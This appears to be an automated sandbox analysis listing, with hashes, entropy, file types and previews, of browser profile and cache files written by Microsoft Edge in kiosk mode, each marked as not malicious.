SHA-256:	8EEDD78499BF498A024C6A71AC9AE9A3F04F8ABC63694C1F2BDB7400B186934F
SHA-512:	CE1F9DBD5A485091BFA93A7FABB0A95EE9CAEFE917A41CD268E519484A16082AA92ACADA308D4BA651B85C9EFC588D843B1A13DB9560D5CC4EF5976502099B59
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638492823597","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638492823597","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\80730a0b-6351-4a6e-ba9e-23a2c6fbab16.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6528
Entropy (8bit):	4.97894434686274
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAempQF2M0/EJ:styJsfQ9dUNk5Dks88bV+FiACP0MJ
MD5:	B36CAFD044AEBC2BE6394C2C884CD226
SHA1:	B4DF0A005DBA5BA166054BA3E4860CC237D4A6D8
SHA-256:	4996EF2B3D0A42D4FCEA695CC8B65A6DFE10FCA601702FB56BC2E309144F4D1F
SHA-512:	70F7BCF07421598280174B6418DCEEE1DEA9497FE407BD63C6E9BC61FA5DBB700866ACE03132AECBD13811330A4F9C74BA2062254D89370001368ED1BA057C93
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	416280
Entropy (8bit):	5.107959227619105
Encrypted:	false
SSDEEP:	1536:WESXs/F3QmLu5RiTYbFOWIwptxI2Lp7NCIFu7EP38WJ5xR8Mm6EW9uU8ywMsF9l7:WygPpjNnxRrmVlrEK9l4/lilWfEwlNw
MD5:	C0FE219B4591446D09DCD81D13E8B096
SHA1:	FE33D3C2CAAAD07C7DB04D897838369CF88D56B4
SHA-256:	A0D1DD6DA6D55074DE387909252D69B6C59BE65E0F08C1AF49075606039A858E
SHA-512:	5B5D3B5F144C634FBA733AF9E4E0BEEE3F4A63C12F68455F893AF924C712A7D48BBAE1F73954B8100C137B240E711F77DF60589B6477D83CA7C99AF7DCA50EB5
Malicious:	false
Preview:	...m.................DB_VERSION.1R#.h.................QUERY_TIMESTAMP:arbitration_priority_list4...13369638497735482.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]..A./..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivilegedExperienceID",.. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",.. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",.. "SHOPPING_AUTO_SHOW_BING_SEARCH",.. "SHOPPING_AUTO_SHOW_REBATES",.. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",.. "SHOPPING_AUTO_SHOW_REBATES_DEACTIVATED",.. "SHOPPING_AUTO_SHOW_REBATES_BING",.. "SHOPPING_AUTO_SHOW_REBATES_ORGANIC",.. "SHOPPING_AUTO_SHOW_PRICE_HIST

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.129389862028467
Encrypted:	false
SSDEEP:	6:PQ6qM+q2P923oH+TcwtOEh1tIFUt827mZmw+2eGMVkwO923oH+TcwtOEh15LJ:Pv+v4YebOEh16FUt82i/+2CV5LYebOEr
MD5:	AF37D700D320FA1508A8AAD30CECAFDC
SHA1:	8A37EB59E8E4B82D80C06F94EE4F639577AF4199
SHA-256:	0ECFD7B8AD15654904E1F04D2CC5FACC28A96456C33E0B398E39717904005F18
SHA-512:	4B4FEB6754829576672878EFEA952E1F9C6C6594DC35028C724FBC96155EB34CA91161D9D21FFC9E7D8DC85F22C897CAB9C15EA84961141439A692345D7195C9
Malicious:	false
Preview:	2024/09/01-00:31:18.157 211c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db/MANIFEST-000001.2024/09/01-00:31:18.158 211c Recovering log #3.2024/09/01-00:31:18.161 211c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.129389862028467
Encrypted:	false
SSDEEP:	6:PQ6qM+q2P923oH+TcwtOEh1tIFUt827mZmw+2eGMVkwO923oH+TcwtOEh15LJ:Pv+v4YebOEh16FUt82i/+2CV5LYebOEr
MD5:	AF37D700D320FA1508A8AAD30CECAFDC
SHA1:	8A37EB59E8E4B82D80C06F94EE4F639577AF4199
SHA-256:	0ECFD7B8AD15654904E1F04D2CC5FACC28A96456C33E0B398E39717904005F18
SHA-512:	4B4FEB6754829576672878EFEA952E1F9C6C6594DC35028C724FBC96155EB34CA91161D9D21FFC9E7D8DC85F22C897CAB9C15EA84961141439A692345D7195C9
Malicious:	false
Preview:	2024/09/01-00:31:18.157 211c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db/MANIFEST-000001.2024/09/01-00:31:18.158 211c Recovering log #3.2024/09/01-00:31:18.161 211c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Asset Store\assets.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\AssistanceHome\AssistanceHomeSQLite

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.3202460253800455
Encrypted:	false
SSDEEP:	6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
MD5:	40B18EC43DB334E7B3F6295C7626F28D
SHA1:	0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
SHA-256:	85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
SHA-512:	8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.06019481198631136
Encrypted:	false
SSDEEP:	6:/FoEXEakM/lsxJdxC5dMtskhj+kllkQzTmGl/ljnB9POWMc7:d7X+E4lCTEsujz/Ztd9POc7
MD5:	2F53F033F3011A064D159754E8D9A1B8
SHA1:	DCDED4FC90AF44FBFEAA2BFC1DC41F0D369812BE
SHA-256:	DEF3809738BC2B946CF5216C04D398B20A7836AC8DE8BDFF1FC2F95039D272DA
SHA-512:	E29B0799CA006B1639445E4DD3D2F6360B6135B6B44F9C193095A83A0E5707FFC0B8708854F703EAE2754E4059948BE5642F45D5C79EF30437A4A58C354670AF
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.12863628553876444
Encrypted:	false
SSDEEP:	48:GV4A3esduV4XesrAG1U6NUeGRY0T3lWp4ryV4Tes4B:GV4A330V4X3rAj6NLGyG3L2V4T34
MD5:	4A9ED470E4B4A52529C468B27DEDAD3C
SHA1:	E3F70EF08B2B94DD4BB4B1C441FBCE43BA265FDE
SHA-256:	DDC303314E1B7E0552D85651B2C193C10E668E41147984FA46FE70BA4D835998
SHA-512:	E1DD1F6CDFB1B1E2049E9E8776B945D3D0901672F1E82F80A839B2E3723EF128A3124192E3C7DBAE2002BA42C1952657703E4B89E596EED7B0EE53680F691ADD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1056768
Entropy (8bit):	0.37226990346483246
Encrypted:	false
SSDEEP:	768:ls2sJth2sJtaNJt/NJtjwJtYtudQfSpM2sJtvwNJt:Rf4M
MD5:	B2AB71B2793521E87693088E945F7B8C
SHA1:	155BDBE0C762811C7344D6DFC16DBCC65DCAB255
SHA-256:	4F0ABFDB49B251C40C460308FA4CBBEFDF4C826B6531DF4DF9B318AE5FC0DC4E
SHA-512:	322CAAFB979D5DB8B6E9D6CA58985CA2F2BDF71B3D416517956201539B4865B732477FCB068ED3CD93243890749A17FF8B54ACCBCA861B932BDF29A8AEE749C0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4202496
Entropy (8bit):	0.04312480187296375
Encrypted:	false
SSDEEP:	192:rH/WCxkD7MDPSYAxmemxb7mngJdv9TXJ4MQmLu5/4eeNd:rOKSXs/J7mGnQmLu5/5eNd
MD5:	4D3862637A3E49DEA6B0E914424F7F3E
SHA1:	2ADD705EDC5981DFA1DDA043EF8917DD416CA4B3
SHA-256:	081133A6F01292BF3CDF0BFBAE44EEE97EC2920D820294EA0447EE2D71249D58
SHA-512:	FA1B6C0C9D28F5686D65A17D43EC6473524C7D576CADA3BA68A94B85375C703E750F624CA82ED3A431DBF5A41203A974E041BFCC6681E04CFBE708B34A4AA861
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\f_000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, was "asset", last modified: Fri Aug 2 18:10:34 2024, max compression, original size modulo 2^32 374872
Category:	dropped
Size (bytes):	70207
Entropy (8bit):	7.995911906073242
Encrypted:	true
SSDEEP:	1536:VzseWV/dT2G9zm5w0vgxQUFm6SM6ZYRuB61K+aK+POIwPru:VoNQGIwvs6S9+I6RWPOIwTu
MD5:	9F5A7E038BF08B13BD15338EC7BD4E16
SHA1:	AB69D28EEA9AE289BB86159C341910538CDDE5B9
SHA-256:	BA0BCBBF170ADB0B5119D19D56C2D004579507DFC4A9215BCCC8663C8A486AF8
SHA-512:	48557ECD56DFD2157304FE752E15E44314667EFC79E6C21312723251E4E1F1BF5BE0A76F88F4B4D83FADB9D81BFB1835B1C0E5CFA7B07214A605F58064BB94B1
Malicious:	false
Preview:	.....!.f..asset.....6.0.W..3....[........9m;.....IH.E...j...}.....PR..w.gg.....@.P...?...x....?./.%..Q...x....}..9..e..f.8..Yb@g...i..$...I.......<....k...{..{.Qg..k..q.....i.Y}..._......\?....5 .5 .`..._i'@....H'.f!...x`...f......v.._1w.u.<.........5.:..^.Ua....H6...x....D:.R..L..2.,.s.f.......FE'..%{]-;+.`....N...=\|.:q...9N.k..i.I.8E.i.I.s..Y...8..fe'...Xo...Xo...#.r$N.u2.o.]....^,.k....{E."......Q.N...AY..u.^o.............Z..ce.irN.{.O$.C.......HJ.HJ..J..hOgA.5.nW.\........}E.%-.A."a<..~.[O....~.......xX.G?Y.3O8d8I...&X....V4...0=.iS....].D.L@.YiS...<.W..W+..#mj...p..8^.\U;oV;W`..^..V...G..SC.9.....i%@g.iS=..`..#.H.p.q..E.q...)....).X..M.X.%.,i.%..V..6.nk.@1S@-..Y.6....K.n....:c.My.....h...9..q...f't.iS.v..6D7...d't.iS.v..F.....faG.t.f....lR.J@!l.0O..T.....T2...\.n..-....L..ES.9.:...B..P1@...P.l.fX.aV..Y6.B5......Mt..SS,l..+..J...).i.6......8...:.Z...2.H.8..Z.>.5.Oi..N`:..6.i.n.h.l.e.h.T\.lr...TE+m.T..).D..F..+.6....J...x.`..`.m..H..i....p...v

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\f_000002

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	403024
Entropy (8bit):	4.987691454989427
Encrypted:	false
SSDEEP:	1536:HYbzOWIwetxI2LpvNCIFu77T38WJ5BR8Mm6EW9uU8ywMsF9leE08d207nMGvykSB:EPenNgBRrmVlr0K2lP/lFlWfEwlCx
MD5:	8F9BDA485854A823E20B47C4897937CF
SHA1:	A86D1E2D3AE6E2F2CAF52DAF6D839EB02FE4B334
SHA-256:	67487ABF17DE6084CF6D117F0551E92D3BA8DC70B08D17D3685603451799EF28
SHA-512:	5C94F19AE23F4220C455DBAD0DB1640A47D981D45306939496744CC1DF2BD5980F25E417C764661CBD608D69E178CB4795763E04F21F5812AC0BA7BBCAA1008C
Malicious:	false
Preview:	{.. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",.. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",.. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",.. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",.. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",.. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",.. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",.. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",.. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",.. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",.. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",.. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Cache\Cache_Data\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	524656
Entropy (8bit):	5.027445846313988E-4
Encrypted:	false
SSDEEP:	3:LsulN:Ls
MD5:	68BC4E3E5F00E827054FF372C4529A3C
SHA1:	EE1C4AAC287DC01B5B469C9A498B8DCF847F773D
SHA-256:	C0CA4F32FC79EB94151E10A01C7E9895AC3990ED1C195B5F4D9D693B5ECAF0E5
SHA-512:	5F3FFF361C28995C7F937198AA33940DA1F597CF7F7949352CBC49E4D22B9A48CBEEC24C809EFC7C3EEF2E22FED3292CE9B48573852544154EF37E543D80417B
Malicious:	false
Preview:	........................................U.@.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\js\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\js\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.8270049474208716
Encrypted:	false
SSDEEP:	3:iyuct00EcMC5:i91Y
MD5:	A9707D04A9343332D6D0D8109B634D15
SHA1:	EAFD1AA5A9003CA748CE2576DAE26CB9D1C44C6F
SHA-256:	E052A922F4EAC83369B91EAD1316002D26D582354F8B7A61AEDBD69860C23FC0
SHA-512:	DD0113A1BE7EFAC27B4334734524395BC10B92C3A1EFEF22127CC1412418637303EF1F9A1D516D2BDA3AD4417F3FF18BB9BA5C8C4E133DEC86659B30549D2D95
Malicious:	false
Preview:	(.......oy retne.........................i'.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\js\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.8270049474208716
Encrypted:	false
SSDEEP:	3:iyuct00EcMC5:i91Y
MD5:	A9707D04A9343332D6D0D8109B634D15
SHA1:	EAFD1AA5A9003CA748CE2576DAE26CB9D1C44C6F
SHA-256:	E052A922F4EAC83369B91EAD1316002D26D582354F8B7A61AEDBD69860C23FC0
SHA-512:	DD0113A1BE7EFAC27B4334734524395BC10B92C3A1EFEF22127CC1412418637303EF1F9A1D516D2BDA3AD4417F3FF18BB9BA5C8C4E133DEC86659B30549D2D95
Malicious:	false
Preview:	(.......oy retne.........................i'.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\wasm\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\wasm\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:C4yR0EBwu:C4y9Bwu
MD5:	68AD59871E88A95E87FDD2CEA7A8BFD5
SHA1:	F97044C3BF1BFE46C51D4F8065F2EBC99BD6E7A3
SHA-256:	B022AD06ADD2B74F25375FEB3092E171BE9DC53B5984C3D5894156CD36176215
SHA-512:	4C6523482A1AED4029A58BBE3F2174D63869D5852818AAC48FF4F1373573C567DA74E0A8BD277C451721DB1A6670A455B6A3D53E64F6FD67D1C081F6384386A0
Malicious:	false
Preview:	(..._R..oy retne........................].).../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Code Cache\wasm\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:C4yR0EBwu:C4y9Bwu
MD5:	68AD59871E88A95E87FDD2CEA7A8BFD5
SHA1:	F97044C3BF1BFE46C51D4F8065F2EBC99BD6E7A3
SHA-256:	B022AD06ADD2B74F25375FEB3092E171BE9DC53B5984C3D5894156CD36176215
SHA-512:	4C6523482A1AED4029A58BBE3F2174D63869D5852818AAC48FF4F1373573C567DA74E0A8BD277C451721DB1A6670A455B6A3D53E64F6FD67D1C081F6384386A0
Malicious:	false
Preview:	(..._R..oy retne........................].).../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\DawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\DawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\DawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\DawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
